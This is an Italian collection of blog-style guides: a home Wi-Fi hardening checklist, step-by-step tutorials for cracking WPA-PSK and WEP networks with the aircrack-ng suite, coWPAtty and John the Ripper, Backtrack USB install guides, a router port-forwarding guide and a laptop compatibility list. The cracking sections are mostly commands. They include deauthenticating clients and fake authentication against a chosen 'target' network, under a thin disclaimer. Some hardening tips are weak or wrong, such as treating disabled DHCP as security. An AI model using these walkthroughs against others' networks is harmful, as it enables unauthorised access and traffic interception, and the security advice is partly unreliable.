Proteggere le reti Wireless

Le reti wireless, o Wi-Fi, hanno portato una rivoluzione importante nella nostra società.

Sono molto comode, ma purtroppo molto insicure.

Questa guida vuole fornire al lettore i suggerimenti su come rendere sicuro il collegamento wireless.

Ma perché dobbiamo rendere sicura la nostra rete wireless?

Ecco alcuni motivi:

♣ violazione della privacy: il vostro hard disk potrebbe essere copiato e i file al suo interno essere

modificati o eliminati. Inoltre potrebbero anche essere installati programmi keystroker, che

leggono e memorizzano tutti i caratteri alfanumerici premuti da vuoi sulla tastiera (e quindi ad

esempio se avete fatto un acquisto on-line i numeri della vostra carta di credito);

♣ il vostro traffico di rete potrebbe essere controllato: potrebbe essere analizzato tutto il vostro

traffico di rete e le pagine web che state visitando in tempo reale, con tanto di password che

vengono inserite durante la navigazione;

♣ la vostra connessione potrebbe essere utilizzata per scopi illegali: la tua connessione potrebbe

essere utilizzata per scaricare illegalmente musica, film coperti da copryright oppure per la

condivisione di materiale pedo-pornografico. Infine potrebbero anche penetrare nel vostro

computer virus e malware.

Non bisogna essere degli esperti di informatica per aumentare il livello di sicurezza delle vostre reti wireless. Bisognerà soltanto seguire questa semplice e chiara guida.

ELENCO CONTROMISURE

Ecco le operazioni che dovrete eseguire per proteggere la vostra rete wireless.

♠ cambiare la password di amministrazione del vostro AP: la password di ogni access

point (AP) di qualsiasi marca viene impostata in fabbrica. E’ importante quindi cambiare la

password in modo che sia lunga almeno 8 caratteri contenenti numeri e lettere In questo modo

potrebbe essere scoperta semplicemente facendo una ricerca molto accurato su internet, tramite

il famoso motore di ricerca Google. Ecco la prova: vi abbiamo allegato una tabella con password

di default solamente di alcune marche di scheda o router wireless presente sul mercato:

www.WiFi-Ita.com

♠ cambiare gli SSID della vostra rete: dovremo cambiare il Service Set Identifier identifica ogni

punto di accesso all’interno della vostra rete. In altre parole l’SSID è un parametro che il router

emette su tutti i dispositivi che rientrano nel suo raggio d’azione;

♠ utilizzare degli SSID non descrittivi: usare degli SSID descrittivi si intende non utilizzare il vostro

nome e cognome, indirizzo e telefono perché sono informazione accessibili da chiunque.

Utilizzate piuttosto lettere e numeri in modo alternato;

♠ disabilitare il broadcast SSID: tutti gli access point mandano a intervalli regolari Beacon Frames

per la sincronizzazione che servono al cliente per impostare la configurazione automatica con la

vostra rete di accesso. Purtroppo contengono gli SSID che potrebbero essere catturati da degli

aggressori per eseguire una attacco alla vostra rete wireless. In altre parole, con questa

operazione disabilitiamo la funzione “Wireless Zero Configuration” che è presente su Windows

XP o altre piattaforme. In questo modo rendiamo la nostra rete wireless non sarà più visibile

nella lista delle reti disponibili;

♠ spegnere l’access point quando non lo si utilizza: questa è la più semplice e utile contromisura

(che serve anche a risparmiare qualche € all’anno di corrente elettrica). Se per qualche motivo

(molto particolare) non potete togliere la corrente elettrica, è sempre possibile disattivare la radio

Wireless interna del vostro router attraverso il menù del vostro access point;

♠ aggiornare il firmaware: occorre controllare (soprattutto dopo parecchi mesi che avete comprato

il vostro access point) che il vostro access point abbia l’ultimo livello di firmare consigliato dal

produttore. Questo lo potrete controllare direttamente dal sito ufficiale del vostro prodotto;

♠ filtrare gli indirizzi MAC: ciascun computer collegato da una rete è identificato dall’indirizzo MAC

che funziona come marchio per ogni scheda wireless. In questo modo potremo specificare gli

indirizzi MAC al nostro router. Come facciamo a sapere quale indirizzo MAC usa la nostra

scheda wireless? E’ molto semplice:

▫ start -> Esegui…

▫ scrivere cmd

▫ ora che si è aperto il prompt del dos scrivere: ipconfig /all

▫ ora abbiamo le informazioni della nostra configurazione di rete

▫ l’indirizzo MAC è presente nell’ultima riga di comando chiamata indirizzo fisico

▫ scrivere exit per uscire dal dos e tornare a Windows;

♠ cambiare la community di default di SNMP: su molti access point è installato un agente SNMP

(Simple Network Management Protocol). Dobbiamo correttamente configurare la community

password, in modo da evitare che qualche aggressore possa ricavare preziose informazioni sul

vostro access point;

♠ non utilizzare come protezione solamente il WEP: il WEP (Wired Equivalent Privacy) è un

protocollo di sicurezza per crittografare i nostri files di rete. E’ un protocollo molto vulnerabile e

per questo dovrete utilizzare insieme al WEP anche il WPA. Il WPA (Wireless Protected Access)

è un altro protocollo di sicurezza molto più sicuro e non vulnerabile (almeno per il momento). Se

disponete di un access point un po’ vecchiotto che può solamente utilizzare il WEP, vi consiglio

di cambiarlo con uno più recente. In questo modo avrete una doppia sicurezza sulla vostra rete

wireless;

♠ non utilizzare il DHCP: il DHCP (Dynamic Host Configuration Protocol, ovvero protocollo IETF) è un

meccanismo che permette la distribuzione automatica degli indirizzi IP a tutti i clienti che si collegano

all’access point. In questo modo qualsiasi cliente può ottenere il vostro indirizzo IP e connettersi alla vostra

rete. Una volta disabilitato il DHCP, dobbiamo assegnare manualmente gli indirizzi IP ad ogni computer

che vogliamo collegare alla nostra rete wireless. Nell’assegnare manualmente gli indirizzi IP, non

dobbiamo utilizzare quelli di default facilmente intuibili, come per esempio 192.168.0.0 o 192.168.1.0.

Utilizziamone qualcuno di più imprevedibile, come per esempio 192.168.99.136 o 192.168.76.21;

♠ limitare l’intensità del segnale wireless: siccome le onde radio non si possono limitare dobbiamo

scegliere una adeguata sistemazione del nostro access point all’interno del nostro edificio in

modo da fornire un sufficiente collegamento solamente nella nostra zona che ci interessa e non

all’esterno. Questo compito risulta molto difficile e per questo vi posso consigliare di non

sistemare il vostro access point vicino a delle finestre e utilizzare delle antenne a basso

guadagno di decibel.

image

Crakkare una rete Wi-fi con chiave WPA

Innanzitutto dobbiamo dire che il WPA fornisce due diverse modalità di autenticazione: RADIUS e PSK, la prima è praticamente inespugnabile, mentre una WLAN che utilizza PSK (la maggior parte) può essere attaccata tramite la cattura dell’handshake, per fare questo è necessario che almeno un client sia collegato alla rete bersaglio.
Come distro di riferimento useremo anche questa volta Backtrack 3.
Iniziamo a divertirci….

PRIMO PASSO: CATTURARE L’HANDSHAKE
Innanzitutto dobbiamo mettere la scheda wi-fi in modalità Monitor mode, quindi apriamo un terminale ed eseguiamo:
airmon-ng start eth1 11
chiaramente al posto di eth1 dobbiamo scrivere l’interfaccia della nostra scheda di rete e al posto di 11 inseriamo il canale utilizzato dall’access point bersaglio (vedi articolo precedente reti WEP).
Adesso eseguiamo airodump-ng, con la seguente sintassi:
airodump-ng –bssid [mac address access bersaglio] –channel [numero canale] -w wpa [interfaccia nostra scheda]
Ricordo che per avere informazioni su il MAC Address dell’access point basterà usare Kismet (vedi qui).
Adesso dobbiamo attendere…che un client si connetta alla rete,e nel momento in cui accadrà,nella nostra finestra dove abbiamo eseguito airodump-ng comparirà:
WPA handshake: 00:13:ce:c6:05:53

DEAUTENTICAZIONE DI UN CLIENT
L’attacco deve essere rapido e può capitare che nessun client si connetta, in questo caso è possibile forzare la deautenticazione del client cosicchè sarà costretto a riautenticarsi e noi saremo pronti per catturare i dati necessari dell’handshake.
Per far ciò apriamo un terminale (lasciando aperta quella di airodump-ng) ed esguiamo aireplay-ng, adesso è il momento di impiegare un Deauthentication Attack!
Il comando da usare sarà:
aireplay-ng -0 1 -a [BSSID] -c CLIENT eth1
Al posto di BSSID inseriremo il MAC address dell’access point bersaglio e al posto di CLIENT scriveremo l’indirizzo MAC del client. Per individuare ul client basta lanciare Kismet e seguire la guida qui.
Adesso che abbiamo i pacchetti di Handshake non ci resta che individuare la passphrase, per far ciò, il metodo più semplice è quello di fare un attacco a forza bruta.

ATTACCO A FORZA BRUTA
Iniziamo con lo scaricare una wordlist (un elenco che ci aiuterà per rubare la passphrase), per il dizionario italiano, quindi apriamo una shell e digitiamo:
wget ftp://ftp.ox.ac.uk/pub/wordlists/italian/words.italian.Z
Adesso possiamo dare questo file a aircrack-ng insieme al file di handshake.
Apriamo un terminale e scriviamo:

aircrack-ng -b [mac address access bersaglio] -w [percorso completo della wordlist creata prima][file contenente handshake]

Dato che questo metodo sarà molto lento, possiamo vedere di fare qualcosa per velocizzare tutto, precalcolando l’hash. Per fare questo si usa il programma coWPAtty. Adesso dobbiamo generare una tabella degli hash, inserendo l’SSID dell’access point (con Kismet lo troviamo) e un file dizionario (va bene quello che già abbiamo). Adesso possiamo richiamare coWPAtty.

TROVARE LA CHIAVE CON coWPAtty
Apriamo un terminale ed eseguiamo:
cd/pentest/wireless/coWPAtty:’genpmk -s [SSID] -f wordlist -d tabella_hash’.SSID
creata la tabella degli hash eseguiamo coWPAtty:
./cowpatty -d [nome tabella hash] -s [nome rete da attaccare] -r [file con i pacchetti di handshake]
Se la passphrase è composta da una parola comune ma con delle lettere variate,per esempio”casa!”…abbiamo bisogno di un tool che proverà queste permutazioni: John the Ripper

CRACCARE LA RETE CON JOHN THE RIPPER
apriamo un terminale e scriviamo:
john—rules –wordlist=[nome dizionario] –stdout | /pentest/wireless/cowpatty/cowpatty -f- -s [SSDI rete bersaglio] -r [file con handshake]

Prima di tutto tengo a precisare che l’uso che si fa delle conoscenze dipende dalla persona…quindi questa guida non vuole assolutamente incitare nessuno all’uso illegale di queste tecniche, quindi per i vari test che farete vi consiglio di usare la vostra rete wi-fi! In questo modo potrete verificare con quanta facilità si riesce ad avere accesso ad una rete protetta….

image

Crakkare una rete Wi-fi con chiave WEP

Oggi tratterò un argomento un pò particolare…craccare una rete wi-fi con chiave WEP

Prima di tutto tengo a precisare che l’uso che si fa delle conoscenze dipende dalla persona…quindi questa guida non vuole assolutamente incitare nessuno all’uso illegale di queste tecniche, quindi per i vari test che farete vi consiglio di usare la vostra rete wi-fi! In questo modo potrete verificare con quanta facilità si riesce ad avere accesso ad una rete protetta….

Detto questo preambolo d’obbligo…adesso è arrivato il momento di divertirsi….

Ho scelto di utilizzare una distro con già installato tutto quello di cui avremo bisogno: Backtrack 3, ma comunque tengo a precisare che i programmi in questione si possono scaricare nella maggior parte delle distro…quindi nessun problema!

Avviamo la nostra Backtrack in modalità live (per esempio da USB)…possiamo seguire questa guida qua.

I passi da seguire sono i seguenti:

Individuare un bersaglio, rete più debole con protezione più bassa

*

Avviamo Kismet: K–>backtrack–>Radio Network Analysis–>80211–>Analyser–>Kismet
*

Ordiniamo le reti: premiamo S e poi Q , la rete più in alto è quella con il segnale più forte, selezioniamo quella in cima e premiamo invio.
*

Informazioni: comparirà una lunga serie di dati sull’access point. Le linee da leggere sono SSID, BSSID, Channel, Encrypt, per uscire q e poi Q. (consiglio di appuntarsi questi dati)

Impostare la scheda di rete del pc in Monitor Mode (Kismet lo fa in automatico ma se lo chiudiamo dobbiamo farlo manualmente)

*

Apriamo un terminale, eseguimao airmon-ng per individuare l’interfaccia della scheda di rete.
*

Eseguiamo airmon-ng stop eth0 (se è eth0 la vostra interfaccia di rete)
*

Eseguiamo airmon-ng start eth0 11 , così facendo abbiamo abilitato la modalità monitor, 11 è il canale (Channel) utilizzato dall’access point bersaglio, canale che abbiamo scritto precedentemente su un foglio.

Catturiamo il traffico:

*

Eseguiamo: airodump-ng -c 11 -bssid 00:80:5A:47 –ivs -w wep eth0 chiaramente dobbiamo sostituire con i valori appropriati che abbiamo sul nostro pc/access point;

11: numero di canale (Channel)

00:80:5A:47: BSSID dell’access point

–ivs: catturiamo solo i pacchetti iv

wep: suffisso del file (verrà creato un file wep-01.ivs)
*

Adesso dobbiamo tener conto della colonna #Data che sono il numero di iv catturati

Velocizziamo la cattura degli iv (Arp Request Replay)

*

Apriamo una shell senza chiudere quella di airodump-ng, scriviamo il comando:

aireplay-ng -3 -b 00:80:5A:47 -h 00:13:Ce:C6 eth0 , cambiando con i valori appropriati

-3: indica di usare l’attacco arp request replay

00:80:5A:47: MAC address dell’access point

00:13:Ce:C6: MAC del client associato alla rete IMPORTANTE: per conoscere il mac basta usare kismet, premere S e Q, selezionare il bersaglio e premere C
*

Se non ci fossero client dobbiamo falsificarne uno:

ARP Request Replay con Fake Authentication

*

eseguire da terminale:

aireplay-ng -1 0 -e SSID -a BSSID -h MACinterfaccia eth0

con i valori appropriati:

-1:indica al programma di effettuare una fake authentication

0: stabilisce il ritardo tra un attacco e il successivo

SSID:della rete bersaglio

BSSID: della rete bersaglio

MAC:della nostra scheda wi-fi

per acquisire il nostro mac…apriamo un terminale e diamo ifconfig

Per esempio:

aireplay-ng -1 0 -e wireless -a 00:80:5A:47:0B:01 -h 00:13:Ce:C6:05:53 eth0

Quando nella finestra di airodump-ng i pacchetti sono 100.000 possiamo iniziare a craccare.

Apriamo una nuova shell e scriviamo:

*

aircrack-ng -a 1 -b 00:80:5A:47 -n64 wep-01.ivs

con i valori appropriati:

1: protocollo WEP

-n64: ricerca chiavi a 64 bit (se dopo migliaia di iv la chiave non viene trovata rifacciamo senza -64)

Se vogliamo possiamo provare il programma che potrebbe craccare la chiave in due minuti, si chiama: wesside-ng

wesside-ng -i interfaccia -a MAC -v BSSID

con valori appropriati:

interfaccia: la nostra interfaccia di rete

MAC: mac address della scheda

BSSID: access point bersaglio

La scheda deve essere in monitor mode

Bene! Siamo arrivati alla fine….non vi resta che provare l’emozione di vedere scritto Key Found!!

aspetto suggerimenti e pareri….la prossima volta vedremo di craccare le chiavi WPA!!

DOWNLOAD BT4

Vi posto qui sotto, e secondo me è il link più sicuro, dove potrete scaricare la BT4

fatene buon uso!!!

http://www.remote-exploit.org/backtrack_download.html

Installare Backtrack 4 Beta su USB con Persistent Changes

Prerequisiti

Diamo per scontato che avete questi requisiti:

1. Sapete partizionare un disco
2. Conoscete Backtrack
3. Conoscete quantomento Linux
4. Conoscete Windows

Materiale occorrente:

1. Una pendrive di almento 2 gb
2. Una distribuzione già esistente di Backtrack 3 o 4 su cd/dvd da utilizzare in live per svolgere le operazioni necessarie
3. UNetbootin – L’utility di cui avevamo già parlato in precedenza che serve a creare distro live su usb

Possiamo iniziare!

Partizionare la pen drive

Prendete il cd o dvd di Backtrack 3 o 4 (l’avevamo accennato tra i prerequisiti). Avviamolo da boot e facciamo partire backtrack.

Utilizzeremo qparted per partizionare la pendrive.

Prendo ad esempio una pen drive da 4 GB perchè è quella che utilizzo io, ma come ho detto basta già una da 2 giga se non si usa spessissimo (altrimenti i log la riempiono ).

Creiamo le seguenti partizioni:

1. La prima partizione deve essere una partizione primaria di 1.2 gb e formattata di FAT32.
2. La seconda partizione invece deve essere grande quanto il resto della pen drive e formattata in ext2.

Rendere la pen drive avviabile

Scarichiamo la iso dvd di backtrack 4 da http://spool.metasploit.com:8000/backtrack
/bt4-beta.iso

Avviamo UNetbootin e inseriamo la pen drive. Selezioniamo come distribuzione backtrack 3 e come sorgente la iso (o il dvd vero e proprio) di Backtrack 4 e come destinazione la pen drive che abbiamo partizionato e diamo OK.

Persistent Changes

Il persistent mode di backtrack 4 và attivato come per backtrack 3.

Ricapitoliamo:

Avviamo Backtrack 4 e montiamo la seconda partizione che avevamo precedentemente formattato in ext2.

Creiamoci all’interno una cartella per contenere i cambiamenti.

Per fare ciò digitiamo sul terminale:

1. mount /dev/sdb2 /mnt/sdb2
2. cd /mnt/sdb2
3. mkdir changes

Adesso dobbiamo apportare dei cambiamente all’avvio di Backtrack 4.

Sempre sul terminale digitiamo:

1. cd /boot/syslinux
2. chmod +Xx lilo
3. chmod +Xx syslinux

Apriamo adesso syslinux.cfg con un editor qualsiasi. Ad esempio nano digitando nano syslinux.cfg

1. cerchiamo la riga “LABEL BT4″.
2. Copiamo questa e le successive 3 righe e incolliamole subito sotto quelle già esistenti (così avremo una nuova opzione all’avvio)
3. Cambiamo “LABEL BT4″ in qualcosa del tipo “LABEL BT4-persistent” e la descrizione in qualcosa tipo “MENU LABEL BT4 Beta – Console – Persistent”
4. Cambiamo la riga che inizia con APPEND nella sezione che abbiamo incollato aggiungendo “changes=/dev/sdx2″ subito dopo “root=/dev/ram0 rw” dove x è la lettera della vostra pendrive in backtrack (per me è sdb ma può variare). Nel mio caso la riga diventa così: “….root=/dev/ram0 rw changes=/dev/sdb2….”
5. Salvate i cambiamenti e uscite.

Adesso riavviando e selezionando la nuova opzione appena creata dovreste essere in modalità persistent, basta provare a salvare un file sul desktop, riavviare e rientrare nella stessa modalità per capire se il tutto funziona.

Questo è quanto per dubbi o chiarimenti sono sempre a disposizione 😉 Resta di fatto che se non avete particolarità e/o esigenze consiglio di aspettare la release definitiva che non dovrebbe tardare molto ad essere disponibile…

Installare BackTrack 4 beta USB

Guida per gli utenti Windows che vogliono installre back track su penna usb (la penna deve essere di almeno 2 gb):

* Scaricate la iso di back track 4 beta da http://www.remote-exploit.org/backtrack_download.html;
* scompattate la iso nella chiavetta;
* verificate quale lettera ha attribuito Windows alla vostra chiavetta usb (supponiamo Z:);
* apriamo il prompt ms-dos e digitiamo Z: (invio) e poi bootinst.bat (invio ed attendiamo).

Finito! ora potete provare ad avviare back track…

Lasciate la penna usb inserita, riavviate il pc e cambiate l’ordine di boot dal bios, in modo da far partire per prima la chiavetta.

GUIDA APERTURA PORTE ROUTER

Ciao a tutti, ho deciso di fare questa piccola guida per aiutare chi magari come me cerca da sempre di aprire queste benedette porte del router per aumentare la velocità di trasferimento dei propri download. Ho preso in esame come software utorrent nella versione 0.9.0.1 e come router un D-link wi-fi modello DSL G604T. Ovviamente do per scontato che prima di fare le operazioni che andrò a descrivere, sul vostro leopardo avete già provveduto con le impostazioni firewall.

Per prima cosa andiamo ad aprire uTorrent e andando sulle preferenze e nello specifico nell’ultima maschera chiamata “NETWORK” andiamo ad inserire il numero della porta che desideriamo adoperare. Io ho adoperato la porta 5061

Fatto questo andiamo ad aprire le impostazioni del nostro router inserendo nel browser da noi utilizzato l’indirizzo 192.168…. ed accedendo con le nostre credenzali andiamo sul menù che ci porta alla gestione delle porte nel caso del nostro router il percorso sarà ADVANCED —>PORT FORWARDING

ci troveremo davanti le varie impostazioni di default del router per prima cosa sceglieremo la connessione di riferimento (libero, telecom…) l’indirizo Lan ovvero l’indirizzo ip del nostro mac ( solitamente cambia soltanto l’ultima cifra dell’indirizzo 192.168…) e per finire andremo sul radio USER e cliccheremo su ADD (in basso) per inserire una nostra regola personalizzata.

una volta in questa schermata andiamo a compilare i campi come vedete nell’immagine ovvero diamo un nome a nostro piacimento a questa regola scegliamo come protocollo TCP,UDP ed inseriamo nei campi che richiedono le porte la nostra che abbiamo scelto all’inizio ovvero la 5061 e per terminare clicchiamo su APPLY.
A questo punto in basso, per esteso, dovrebbe apparire la nostra regola appena creata.

Fatto ciò torniamo alla schermata PORT FORWARDING, sempre sull’impostazione user adesso troveremo la regola da noi creata, adesso non ci resta che cliccare su ADD per far memorizzare il tutto al router ed infine APPLY…ed il gioco è fatto!

Spero di essere stato chiaro con questa piccola guida molto amatoriale..Ovviamente sono sempre a disposizioni per ulteriori chiarimenti.

Questa guida è stata offerta da

MAC4BREAK

Lista dei pc su cui Backtrack è stato testato

Ecco la lista dei pc su cui Backtrack è stato testato. La lista è indicativa e in fase d’aggiornamento con BT4 e la beta di BT4. Contribuite all’aggiornamento della lista sul sito wiki di backtrack!

Acer
Acer Travelmate
Travelmate 212TXV

* Runs fine with boot parameter ‘irqpoll’ (enter at first prompt ‘bt irqpoll’)
* Otherwise hangs with ‘hdc: lost interrupt’ (repeating)

Travelmate 290

* Runs fine with no extra parameters.
* IPW2100 can enter monitor mode, but not inject.
* lspci output
*
* Travelmate 290D
* IPW2200
* Packet Injection with IPW2200 is possible!

Travelmate 331

* Runs fine with boot parameter ‘irqpoll’ (enter at first prompt ‘bt irqpoll’)

Travelmate 345

* Runs fine with boot parameter ‘irqpoll’ (enter at first prompt ‘bt irqpoll’)
* Otherwise hangs with ‘hdc: lost interrupt’ (repeating)

Travelmate 2200

* Runs fine with no extra parameters.

Travelmate 2301LC

* Runs fine with no extra parameters.
* Make sure to use “xconf” before using the GUI or the graphics will get blurry.
* No built-in wireless card, so WiFi compatibility depends on the PCMCIA or USB device you use.

Travelmate 2350

* Need to run xconf before startx or there are gfx glitches
* Having trouble with wireless support
o Windows reports the wireless card as “acer IPN2220 Wireless LAN Card”
* Can’t run Kismet

Travelmate 2492WLMi

* Runs fine with no extra parameters.

Travelmate 3201XMi

* Runs fine with default params
* Wireless OK (IPW2200)
* Bluetooth not fully tested
* Screen res 1024×768

Travelmate 3302WXMI

* Runs fine with no extra parameters.
* Make sure to use “xconf” before using the GUI or 1280×800 wonn’t be available.

(Note: Don’t know how to enable bluetooth while running BackTrack)

Travelmate 4000LCi

Runs fine,network monitor mode support, but causes static on sound card after more than 20 minutes of use.
Travelmate 4101LMi

* Runs fine with no extra parameters.

Travelmate C110

* Runs fine with no extra parameters.

Travelmate C200

* Runs fine with no extra parameters.

Acer Ferrari
Ferrari 1000

* Hangs on bootup, loading ALSA drivers “ALSA sound/pci/hda/hda_codec.c: 204: hda_codec: invalid dep_range_vol 0:7fff”

(Note: Is there a way to skip the alsa drivers from loading? i don’t really need sound)
Try the solution stated for Aspire 3102WLMi, that have the same problem, and edit here if it works.

Ferrari 4005 WLMi

* Boots fine into KDE/flux with no configuration needed
* Sound does not work correctly (distorting etc..)
* Detects onboard ethernet & broadcom wireless devices

Acer Aspire
Aspire 1350

* Works fine without extra parameters

No, it need to edit /etc/X11/xorg.conf

1. At the section “Monitor”
2. add

HorizSync 31.5 – 48.5 VertRefresh 59.0 – 75.0

1. At the subsection “Display with depth 24”
2. add

Modes “1024×768” “800×600”
Aspire 1355

* Works fine without extra parameters

Aspire 1520

* Needs the “irqpoll” kernel option at the boot to support cardbus cards (tested with D-Link DWL-G650 rev. C3).

E.g. “bt irqpoll”

* No built-in wireless card, so WiFi compatibility depends on the PCMCIA or USB device you use.

Aspire 3102WLMi

* Hangs on bootup, loading ALSA drivers “ALSA sound/pci/hda/hda_codec.c: 204: hda_codec: invalid dep_range_vol 0:7fff”

(Note: You can get it to boot up by using ‘bt debug’ at the boot prompt!)

Aspire 3628AWXMI

* Runs fine with no extra prarameters
* i have change the build in centrino wlan (IPW2200) to a atheros modul and packet injection rocks

:)

Aspire 3680, 3690 + Aspire 5512 wlmi

* Runs fine with no extra parameters.
* detect wireless
* just the screen doesn’t the right widescreen resolusion but still usable (Aspire 5512 wlmi tested ati.lzm but still nothing)

Aspire 1692 WLMi

* Runs fine with no extra parameters.
* detect IPW2200
* Packet Injection with IPW2200 is possible!
* just the screen doesn’t the right widescreen resolusion but still usable (Aspire 5512 wlmi tested ati.lzm but still nothing)

Aspire 1692 WLMi (DDR2 version)

* Runs fine with no extra parameters.
* Detect IPW2200
* Screen is correct (under BT2) without extra parameters.
* Kismet function !

Aspire 1682WLMi

* Runs fine without extra parameters.

Aspire 4315

* widescreen auto detected and displays at 1280×800
* AR5BXB63 aka ath5007EG works great, injects (have not tried wep/wpa)
* hsfmodem can’t figure out, pretty sure its /dev/ttyS2 (HDAUDIO) anyhelp would be appreciated (i like war dialing)

– note too self dont fucking touch hsfmodem package or linuxant ever agian it likes to bring any install to its knees fuck them

and their drivers /me sticks gum in the modem port and tries to forget it exists

Aspire 5051AWXMi

* Hangs on bootup, loading ALSA drivers “ALSA sound/pci/hda/hda_codec.c: 204: hda_codec: invalid dep_range_vol 0:7fff”.

(Note: Will test leaving as per 5101AWLMi and boot options ‘bt debug’ as per 3102WLMi)

Tried on 5051AWXMi today, hung on the above 5-10mins later booted to prompt.
Aspire 5100

* Also hangs on bootup, wait for a few minutes. You will see the hda_codec.c error for a while (6 minutes on this one), and then it boots up fine.
* Built in atheros 5005g wireless card works flawlessly for injection/sniffing and every other task I’ve tried.
* Note: The currently used Aspire 5100 has a AR5007EG Atheros card, NOT a 5005g. BackTrack does not automatically detect the card.
* If you do a HDD install, you can remove the hda_codec.c (from another OS, I did it from ubuntu), it still hangs a tad on bootup, but about 1/10 of the time (Make sure you remove the right file, and by remove, I mean copy it to another location, then delete the original)

Aspire 5101AWLMi

* Hangs on bootup, loading ALSA drivers “ALSA sound/pci/hda/hda_codec.c: 204: hda_codec: invalid dep_range_vol 0:7fff”, but just keep it running for like 10 minutes and it will start just fine.

Aspire 5102WLMi

Not Runs from boot but das work under Pc virtualisation programs like Microsoft Virtual PC 2007 Or VMware Workstation P.S. Not probed All Capabilites of Bt2 Just instal but all locks fine for now

NOT WORK WIRLESS CARD AR5005G Atheros card
Aspire 5050

Work great out of the box including Wifi. Sound has a problem that requires you to run alsamixer and unmute surround and turn the volume up. Other than that built in driver support works 100%
Aspire 5610/5610z

Runs great from live cd or from live flashdrive. Built-in driver support is great, no extra commands needed to get all hardware up and running. Wireless worked right off the bat. Even installed to local HDD with no problems.
Aspire 7004WSMi

Boots fine from the CD without any errors or warnings such as ALSA etc. Built-in Atheros 5005G is automatically detected and setup perfectly.
Aspire 9302wsmi

* Runs fine with no extra parameters.
* chipset wifi : atheros AR5BMB5.
* Driver by default : madwifi.
* Injection no tested.

Aspire 9410Z

* Runs fine from live cd with no extra parameters
* chipset wifi : Broadcom BCM4311 802.11g
* Injection not working fine : got “write error, cannot allocate memory” if you try to send packets quickly (it doesn’t work for me with -x parameter over 10 !)
* Sound : OK, no problems

Alienware


Area 51m

* Runs fine with no extra parameters.

m7700 Aurora

* Required acpi=off irqpoll to boot and function properly

m17x

* Boots but xserver fails on startup, CLI only


Apple


MacBook Pro Core 2 Duo 2.4GHz (2008, nVidia Geforce 8600M GT)

* lspci output

* Wireless does not work out of the box, you can use either broadcom’s linux_sta or ndiswrapper

MacBook Pro Core 2 Duo (2008, nVidia Geforce 8600M GT)

* lspci output

BT 2

* Screen resolution is 1440*900, unsure of refresh rate
* Internal wireless doesn’t function out of the box.
* Keyboard and trackpad works fine. (unsure how to enable a right click using trackpad)

BT 3 beta

* Screen resolution is 1024*768 @85hz VESA Mode unless you install the drivers using source kernel. NVIDIA v169 works great in 1900×1200. (A tutorial on how to get it up and working is here http://wiki.backtrack-fr.net/index.php/Con…ement_du_driver (FRENCH))
* Internal wireless function out of the box and injects.

MacBook Pro Core 2 Duo (2006, ATI Mobility Radeon X1600)

* lspci output

* Mostly everything works very well
* Boots up reasonably fast
* Highest screen resolution is 1024×768 @ 85Hz, unless you install the ATI drivers and reboot the X Server.
* No sound output through built-in speakers. However it can be heard via headphones or external speakers.
* Not all MacBook Pro Core Duo’s will let you switch between virtual desktops (i.e. alt-f1/alt-f2/ctrl-alt-f1)
* Internal wireless doesn’t function out of the box.

MacBook Pro Core 2 Duo (2007 Santa Rosa, nVidia Geforce 8600M GT)

* lspci output
* Boots properly and fast, works well.
* Internal ethernet not working.
* Internal wireless not working, use USB dongle.
* Bluetooth not working.
* Max resolution is 1024×768 @ 85Hz (compared to the native 1440×900) due to outdated Nvidia drivers. Installation of new Nvidia closed-source drivers has not yet been successfully performed.

MacBook Core Duo

* Not working
* Keypad typing double at login
* Works fine with VMware Fusion software. But Bluetooth doesn’t work, and WiFi isn’t recognized, though with Firefox, I could have an Internet access (??).
* BT3 Beta works if you boot it using VESA drivers, wifi seems to work w/ packet injection

MacBook Core 2 Duo

* MacBook Pro Core 2 Duo lspci output
* Not working correctly: trackpad and keyboard. keyboard works in BT2 beta, but not in final
* Not working: WiFi (no drivers)


Asus


Eee PC

* Fully functional. Injection with built-in wifi card working.
* See http://forums.remote-exploit.org/showpost….059&postcount=1 for more details.
* For certain scrolling issues (no scrollbar) see http://forums.remote-exploit.org/showthrea…58431#post58431
* Eee PC users with Atheros chipset (namely AR5006EG) should use get this madwifi driver
* Eee PC users with Ralink chipset (namely RT2860) may not have full monitor and injection support. The drivers maybe available from Ralink website.
* New 701 Eee PC users with both Atheros Attansic chipset and Realtek unknown chipset:
o 01:00.0 Network controller: Realtek Semiconductor Co., Ltd. Unknown device 8199 (rev 22) [10ec:8199]
o 03:00.0 Ethernet controller: Attansic Technology Corp. Unknown device 1026 (rev b0) [1969:1026]

Should use this driver for wired (you will need kernel.lzm if not using the bt3 usb version)

The wireless chipset is known as Realtek RTL8187SE which may have some support from wireless-testing.git. Try this
A2500H

* Runs fine with no extra parameters.

A6Km Q012H

* Runs fine with no extra parameters.
* Internal Broadcom bcm4318 runs OK.

A6JA

* Runs fine with no extra parameters.

A6T AP008B

* Runs fine with no extra parameters.
* Do not run xconf. KDE is unabled to start afterwards.

A6Va B028H

* Runs fine with no extra parameters.

L3000D

* Runs fine with no extra parameters.

A8JS

* Runs fine with no extra parameters (except sound).
* Do not run xconf. KDE is unabled to start afterwards.

A6R

* Runs fine with boot parameter ‘irqpoll’ (enter at first prompt ‘bt irqpoll’)
* Otherwise hangs with ‘hdc: lost interrupt’ (repeating)
* Do not run xconf. KDE is unable to start afterwards.

A6Rp

* Runs fine with bt acpi=off parametr.

L3S/L3800 with a Netgear WGT511 PCMCIA Wireless card

* Runs fine
* run xconf then ati to get a nice KDE at 1400×1050 !

A6Vc

* Runs fine with no extra parameters.
* Sound doesn’t work with the CD (Realtek HD).
* No problem to instal on HD (and with the sound)

R1F

* Runs fine with no extra parameters.
* No sound from live CD.
* Built in wifi adapter not recognized.
* Video adapter works flawlessly
* Bluetooth untested

M6800Ne

* Runs fine with no extra parameters.
* run xconf then ati to get a nice KDE at 1400×1050!
* BT3 Beta – Kismet doesn’t work as packetsource is not set.

X51L

* BackTrack 3 Final runs fine with no extra parameters.
* The built in Atheros miniPCI wireless card works without any problem (monitor mode and packet injection tested).
* PCMCIA detected. Touchpad works fine. Sound card not working properly.
* Screen resolution is 1024×768 on startup (KDE).

M2N-MX SE PLUS

* If boot freeze and black screen, try adding “noapic”

F3E

* BackTrack 3 Final runs fine with no extra parameters.
* Don’t run Compiz

Averatec


AV3715-EH1

* lspci output
* Runs fine with no extra parameters.
* Ethernet, WiFi, Video, Audio, FireWire, USB all auto-detected successfully.
* Track pad not detected. USB Mouse auto-detected successfully.
* Both KDE and flux will not start properly if you run xconf.

AV1020-ED1

* Trackpad, Ethernet, Ralink2500, Audio, and USB are auto-detected correctly
* Only thing that isn’t auto detected is the screen resolution. To fix:

– Edit /etc/X11/xorg.conf
